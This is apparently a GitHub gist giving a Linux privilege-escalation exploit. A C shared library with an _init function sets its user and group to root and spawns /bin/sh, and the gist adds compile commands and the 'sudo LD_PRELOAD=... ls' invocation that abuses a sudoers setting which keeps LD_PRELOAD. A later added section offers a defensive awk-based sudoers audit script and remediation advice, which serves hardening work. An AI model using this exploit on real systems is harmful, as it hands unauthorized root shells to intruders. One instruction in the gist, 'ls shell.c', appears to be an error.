@MoElaSec
Created January 2, 2022 14:38
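```c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* setuid(), setgid() */

/* Runs when the library is loaded (built with -nostartfiles). */
void _init() {
    unsetenv("LD_PRELOAD");   /* keep child processes from loading this library again */
    setgid(0);
    setuid(0);
    system("/bin/sh");
}
```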
MoElaSec commented Jan 2, 2022

Privilege escalation

You exploited a Linux target, but the user is not root; however, `sudo -l` shows LD_PRELOAD can execute ls (or whatever) as root without a password.
Save this script and use the command with it: `ls shell.c`


Note: `__attribute__((constructor))` is better, as the `_init` func is obsolete.

```sh
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
file shell.so
```


```sh
id
sudo LD_PRELOAD=/home/<user>/shell.so ls
id
```

Make sure to use the right user.
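A defender-side check for the sudo misconfiguration this gist depends on, as an added example that is not part of the original gist: it scans sudoers text for settings that carry `LD_*` variables into commands run as root. The sample policy, its user names, and the choice of patterns to flag are assumptions made for illustration.

```shell
#!/bin/sh
# Added example, not part of the gist. Flags sudoers settings that let a
# caller-supplied LD_* variable reach the dynamic linker of a root process.

# audit_sudoers FILE...  prints "file:line: reason: text"; returns 1 on findings.
audit_sudoers() {
    awk '
    function flag(why) { printf "%s:%d: %s: %s\n", FILENAME, FNR, why, line; bad = 1 }
    { line = held $0; held = "" }
    # sudoers joins lines that end in a backslash; do the same before matching
    line ~ /\\$/ { held = substr(line, 1, length(line) - 1); next }
    # skip comments, but keep "#1000 ALL=..." style uid entries
    line ~ /^[ \t]*#([^0-9]|$)/ { next }
    line ~ /^[ \t]*Defaults/ && line ~ /env_keep/ && line ~ /LD_[A-Z_]+/ {
        flag("env_keep preserves a dynamic-linker variable") }
    line ~ /^[ \t]*Defaults/ && line ~ /![ \t]*env_reset/ {
        flag("env_reset is disabled") }
    line ~ /^[ \t]*Defaults/ && line ~ /[ \t,]setenv([ \t,]|$)/ {
        flag("setenv lets callers bypass env_keep") }
    line ~ /[ \t):]SETENV[ \t]*:/ {
        flag("SETENV tag lets callers bypass env_keep") }
    END { exit bad + 0 }
    ' "$@"
}

# Constructed sample policy (not taken from any real host).
write_sample() {
    cat > "$1" <<'EOF'
Defaults env_reset
Defaults env_keep += "LD_PRELOAD"
# Defaults env_keep += "LD_LIBRARY_PATH"
alice ALL=(root) NOPASSWD: /usr/bin/ls
bob   ALL=(root) SETENV: /usr/bin/ls
Defaults:carol env_keep += \
    "LANG LD_LIBRARY_PATH"
EOF
}

tmp=$(mktemp) && write_sample "$tmp"
audit_sudoers "$tmp" || echo "review the lines flagged above"
rm -f "$tmp"
```

On a real host, point `audit_sudoers` at `/etc/sudoers` and the files under `/etc/sudoers.d/`; removing `LD_PRELOAD` from `env_keep` and leaving `env_reset` on closes the path shown in the gist.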
